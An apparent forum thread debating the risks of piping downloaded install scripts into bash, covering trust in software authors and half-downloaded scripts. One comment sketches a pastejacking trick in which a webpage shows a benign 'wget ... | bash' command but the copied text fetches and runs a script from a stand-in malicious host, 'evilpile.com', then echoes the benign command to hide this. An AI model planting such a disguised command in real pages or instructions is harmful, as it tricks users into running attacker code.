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The same argument applies for the following command.

wget https://example.com/script.sh | bash

If you trust the source, you might as well install it. Otherwise, we're basically arguing that everyone who has ever installed any non-distro software is an idiot.

Consuming http or the connection dying and script ending early and being left in a weird state is probably a more interesting argument than the trust issue.

Well, you can combine the two approaches.

The text on the webpage reads

wget https://example.com/script.sh | bash

but when copied is actually

wget https://evilpile.com/script.sh | bash; echo wget https://example.com/script.sh \| bash

or whatnot.

The connection-closed problem can be solved by wrapping the code in the script within a function, then calling that function at the end of the script. Of course, that needs to be done by the software's author, but we trust the authors of our software if we're going to run it, yes?

Or even

$ git clone https://github.com/somedev/package .

$ ./install.py

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